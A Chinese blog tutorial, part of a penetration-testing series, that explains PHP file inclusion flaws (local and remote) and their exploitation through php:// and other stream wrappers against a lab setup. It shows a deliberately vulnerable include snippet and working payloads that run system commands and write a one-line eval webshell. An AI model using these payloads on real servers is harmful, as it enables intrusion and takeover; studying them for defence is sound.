网络安全与渗透:文件包含漏洞(十一)此生无悔入华夏,男儿何不带吴钩

最新推荐文章于 2024-07-13 15:35:04 发布
最新推荐文章于 2024-07-13 15:35:04 发布
阅读量248 收藏
点赞数
分类专栏: 网络安全与渗透 文章标签: php 渗透 网络安全 文件包含漏洞 漏洞挖掘
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_25490573/article/details/107797401
版权

 

中华人民共和国网络安全法

阅读本文前,请熟读并遵守中华人民共和国网络安全法:
http://gkhy.jiujiang.gov.cn/zwgk_228/jc/zcwj/202006/P020200618385401918830.pdf
 

目录


 

简介

简单一句话,为了更好地使用代码的重用性,引入了文件包含函数,可以通过文件包含函数将文件包含进来,直接使用包含文件的代码。
在包含文件时候,为了灵活包含文件,将被包含文件设置为变量,通过动态变量来引入需要包含的文件时,用户可以对变量的值可控而服务器端未对变量值进行合理地校验或者校验被绕过,这样就导致了文件包含漏洞。通常文件包含漏洞出现在PHP语言中。
 
 

PHP通常引发此漏洞的函数

  • include()
  • include_once()
  • require()
  • require_once()

文件包含漏洞常用场景

  • 具有相关文件包含函数
  • 文件包含函数中存在动态变量 如include $file;
  • 攻击者能够控制该变量 比如: f i l e = file= file=_GET[‘file’];
  • 常见的如:file page 等参数
     
     

相关配置介绍

php配置文件

php.ini 是php的配置文件,里面包含了众多配置,在php启动的时候被读取。自php3.5起,php支持每个目录的.htaccess风格的ini文件。此类文件仅被CDI/FASTCGI SAPI处理。如果使用apache,则用.htaccess文件同样效果。
以下是一些常见配置:

  • short_open_tag = on 允许php使用短标签,如用 <? 代替 <?php,可利用短标签绕过waf
  • disable_classes= /disable_functions= 禁用类/函数 可接收逗号分隔的函数名列表作为参数
  • file_uploads = on 设置允许上传
  • upload_max_filesize = 8m 最大允许上传多大的内容
  • upload_tmp_dir 上传临时文件保存的目录,且这个目录可写
  • allow_url_fopen = on 是否允许打开远程文件,该项打开,就能够利用上面的函数远程包含文件
     
     

本地文件包含 LFI

当被包含的文件在服务器本地时,就形成本地文件包含
假如服务器存在一个include.php文件,其代码如下:

<?php
	$file=$_GET['file'];
	include $file;
?>

那么就可以从浏览器上反问一些服务器敏感路径:如下:
在这里插入图片描述
在linux系统下就可以访问etc下面的内容,危害十分巨大。
当然,我们也可以将file参数指向我们上一篇博文中的图片木马,从而完全渗透到服务器。
 
 

远程文件包含 RFI

当被包含的文件在第三方服务器时,叫做远程文件包含。
前提条件,需要php设置两个参数

  • allow_url_fopen = on
  • allow_url_include = on 允许包含url对象文件等

这里开启一个本地的php服务,并写一个phpinfo的文件,也可以是一句话木马,然后远程包含
效果如下
在这里插入图片描述
 
 

PHP伪协议包含

php://input

它是可以访问请求的原始数据的只读流,简单来说就是,获取post传过去的数据
利用条件只有:
allow_url_include = on
利用方式:
index.php?file=php://input
POST:

<?php phpinfo();?> <?php system('ipconfig');?> <?php fputs(fopen('shell.php','w'),'<?php @eval($_POST["cmd"]);?>');?>

下面来演示一下
1.将上面的include.php文件放在文件漏洞靶场第一关目录下,如下图
在这里插入图片描述
然后在浏览器中访问,如下图,
在这里插入图片描述

php://filter

我们一般用它来读取源码,一般用base64先编码,再解码
利用方式
index.php?page=php://filter/read=convert.base64-encode/resource=file1.php
index.php?page=php://filter/read=convert.base64-decode/resource=file1.php
下面演示一下:
首先还是在浏览器中访问
在这里插入图片描述
粘贴内容,在线解码:https://base64.us/
可以看到php源码内容
在这里插入图片描述

phar://

这个是利用压缩包读取内容的方式执行木马
利用条件,php版本低于5.3.0

首先创建一个文件test.txt 然后在里面写入<?php phpinfo();?>,或者一句话木马,然后压缩成一个test.zip, 通过文件上传等方式将这个压缩包上传到服务器。
在浏览器中这样访问:http://192.168.10.40/upload-labs-master/Pass-01/include.php?file=pchar://压缩包路径/test.txt
如果include.php和压缩包不在一个目录,可以利用…/找到压缩包的目录

类似它的还有: zip://压缩包绝对路径%23文件名称

data:url schema

利用条件:

  1. php版本大于5.2
  2. allow_url_include = on
  3. allow_url_fopen = on

利用方式:

include.php?file=data:text/plain,<?php phpinfo();?>
include.php?file=data:text/plain,<?php system('whoami');?>

 
 

通过session文件包含getshell

未完待续。。。

[ 渗透测试面试篇 ] 渗透测试面试题大集合(详解)(4-6)文件包含相关面试题
qq_51577576的博客
12-01 1298
[ 渗透测试面试篇 ] 渗透测试面试题大集合(详解)(4-6)文件包含相关面试题 渗透方向的岗位,涉及到的知识点是很广泛的。 这里我总结了整个一系列的面试题,可能没有覆盖到全部的知识面,但是应该是比较全面的,本文主讲解web漏洞文件包含方向的面试题。 如果整个系列的问题搞懂了大部分,那找个网安方向的工作基本上没什么问题了。 当然了,可能也不是说这些问题都会被问到,但这些题目都是和网安岗位相契合的。
【预告】自动化渗透测试平台
qq_42067124的博客
02-22 914
自动化渗透测试平台,字如其意,即只需要输目标域名,就可自动进行渗透测试,目的还是在于减少平时做项目时的工作量,将重复的工作自动化(降本增效)
安全服务面试总结 (第九弹 文件包含漏洞
qq_42488061的博客
09-25 410
简单一句话,为了更好地使用代码的重用性,引文件包含函数,可以通过文件包含函数将文件包含进来,直接使用包含文件的代码。 漏洞成因 在包含文件时候,为了灵活包含文件,将被包含文件设置为变量,通过动态变量来引需要包含的文件时,用户可以对变量的值可控而服务器端未对变量值进行合理地校验或者校验被绕过,这样就导致了文件包含漏洞。通常文件包含漏洞出现在PHP语言中。 PHP产生文件包含的函数 include( ):当使用该函数包含文件时,只有代码执行到 include()函数时才将文件包含 进来,发生错误时之给
文件包含漏洞简单总结【附练习记录】
ximo的博客
02-13 387
文件包含漏洞 什么是文件包含: 为了更好的使用代码的 重用性,引文件包含函数,可以通过文件包含函数将文件包含进来,直接使用包含文件的代码。 文件包含漏洞的成因: 为了灵活的包含文件,将被包含文件设置为变量,通过动态变量引需要包含的文件时,用户对变量的可控而服务器端卫队变量值合理的校验或被绕过。 文件包含函数: include() // 找不到被包含文件时产生警告,脚本继续执行 include_once() // include类似,但如果该文件的代码已经被包含,则不会再次包含 require()
SQL中的数据处理函数(不包括聚集函数)
企鹅菜鸟的成长过程
04-15 1124
不同的DBMS支持不同的函数,意味着为特定SQL实现编写的代码在其他实现中可能不正常,请看各数据库的手册 1.用于处理文本字符串(如删除或填充值,转换值为大写或小写)的文本函数 2.用于在数值数据上进行算术操作(如返回绝对值,进行代数计算)的数值函数   ABS(),COS(),EXP(),PI(),SIN(),SQRT(),TAN() 3.用于处理日期和时间值从这些值中提取
sql的不包含包含
热门推荐
weixin_55530282的博客
05-04 2万+
不包含(not contains)和包含(contains)的多种使用方式
探究各大类大模型:核心差异应用特色
最新发布
m0_70839135的博客
07-13 859
在人工智能的浩瀚星空中,各大类大模型如同璀璨的星辰,各自散发着独特的光芒。它们以卓越的性能和广泛的应用场景,引领着技术的前沿,推动着社会的进步。然而,每一颗星辰都有其独特的轨迹和光芒,各大类大模型亦然,它们在训练数据和模型结构上依然不同,本文将你揭秘它们的不同之处
大连英博vs无锡吴钩赛事前瞻
06-05
我无法提供大连英博无锡吴钩的具体赛事信息或前瞻。如果你对足球比赛感兴趣,建议你查看相关的体育新闻网站、赛事官方渠道或者体育应用程序获取最新的赛前动态、球队阵容、比赛预测等内容。如果你有关于足球比赛的...
POI读取并解析xlsx格式的excel文件
战斗小火鸡
08-15 3156
本文主要采用POI来解析excel文件。如果需要解析的是支持数据量更大的.xlsx后缀的格式,需要导的jar包为poi-ooxml-3.15.jar;若是需要解析的是.xls后缀的格式,需要导的是poi-3.17-beta.jar。jar版本建议采用公司maven库中的最新版。 本文的demo中,解析的是xlsx后缀的excel文件。xls格式的类似,只需要将所有的XSSF开头的都改成HSS
2007高考满分作文:独上高楼.doc
02-07
【标题】:“2007高考满分作文:独上高楼.doc”揭示了古代文人的精神独立坚守 这篇高考满分作文以“独上高楼”为主题,通过对李白、苏东坡和辛弃疾三位文人的人生选择和精神追求的描绘,展现了他们在面对世俗期望...
文件类漏洞面试题
m0_61990875的博客
11-08 552
文件类面试题
owasp漏洞常见基础安全面试题 --文件操作漏洞 文件上传 文件包含、文件下载、文件读取
ouyang_ly的博客
09-09 1146
文件上传漏洞: 文件上传漏洞原理:在具有上传功能的网站上传恶意脚本文件(webshell文件),并找到文件所 在目录位置,最后将恶意文件传递给php解释器执行。 文件上传绕过waf:白名单:MIME绕过、%00截断、0x00截断、0x0a截断 黑名单:大小写绕过、点绕过、空格绕过、双后缀名绕过 前端...
文件包含漏洞_文件包含漏洞和部分的CTF题
weixin_39516865的博客
12-18 529
文件包含漏洞web6 在bp里面添加:X-Forwarded-For:127.0.0.1web11md5碰撞 上脚本: import hashlib def get_token(txt): m1 = hashlib.md5() m1.update(txt.encode("utf-8")) token = m1.hexdigest() return toke...
文件包含漏洞三道题
qz362228的博客
05-04 2061
1.绕过require_once限制 题目页面: 有两个require_once,则this_is_flag.php已经被包含一次就不会再包含了。而题目意思就是说flag在this_is_flag.php文件中。所以要想绕过前面那个require_once,而执行后面那个。在浏览器中搜索绕过require_once限制 因为知道文件路径,所以最后是/www/html/file_include/Assess01/this_is_flag.php ?url=/proc/self/root/proc/self/r
文件包含漏洞-04】经典面试题:已知某网站仅存在本地文件包含漏洞时,如何GetShell?
m0_64378913的博客
06-23 1328
实验要求:假设攻击者已经知道某网站存在且仅存在本地文件包含漏洞,并且没有文件上传漏洞点及其他漏洞,如何GetShell。 实验目的:利用本地文件包含漏洞GetShell。(1)靶机本文实验基于WAMP环境进行测试,环境部署过程参考文章《【语言环境】WAMP环境部署及优化—以win2008R2SP1为操作系统》,IP为172.16.1.1。查看靶机PHP版本。需要查看所搭建的服务器的PHP版本,下一步修改其配置。打开phpstudy安装文件夹,找到PHP-5.4.45版本对应文件夹,将文件php.ini中的a
文件包含漏洞小结
刘启明
06-19 541
1. 原理 在通过服务器脚本的函数引文件时,由于传的文件名没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露、恶意代码的注等。 开发过程中,多个文件都会用到的代码,通常会放到一个单独的文件中,用到时再包含进来。当把包含的文件写死在程序中时,该漏洞是不存在的,但很多情况都会动态的去包含所需的文件,这时候则会产生文件包含漏洞。 实例代码 <?php $filename...
sql 不包含_干货千万条,SQL面试秘籍第一条!
weixin_39657575的博客
12-08 182
什么是SQL?SQL是一种用于数据库通信的编程语言,是技术行业招聘中需要掌握的最有用的技能之一。SQL是结构化查询语言的缩写,这个惊人的工具是分析大型数据集的必备工具。当它应用于关系数据库(以某种方式相互关联的唯一数据表)时,它的优点尤其明显。由于SQL在技术领域无处不在,许多公司在给出工作邀请之前都会进行SQL面试。这有助于确保求职者(尤其是从事项目管理、分析、商业智能和软件工程相关工作的人员...
《MySQL必知必会》第4篇:全文本搜索
Java
08-03 310
第十八章、全文本搜索 1. 全文本搜索的使用 这些列中有一个名为 note_text 的列,为了进行全文本搜索,MySQL根据子句 FULLTEXT(note_text) 的指示对它进行索引。这里的FULLTEXT 索引单个列,如果需要也可以指定多个列。 在定义之后,MySQL自动维护该索引。在增加、更新或删除行时,索引随之自动更新。 可以在创建表时指定 FULLTEXT ,或者在稍后指定(在这种情况下所有已有数据必须立即索引)。 不要在导数据时使用 FULLTEXT 更新索引要花时间,虽然不是很多,
安服面试 --- 01
weixin_62443409的博客
08-30 5815
利用虚拟机软件或者虚拟机中运行的软件的漏洞进行攻击,以达到攻击或控制虚拟机宿主操作系统的目的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值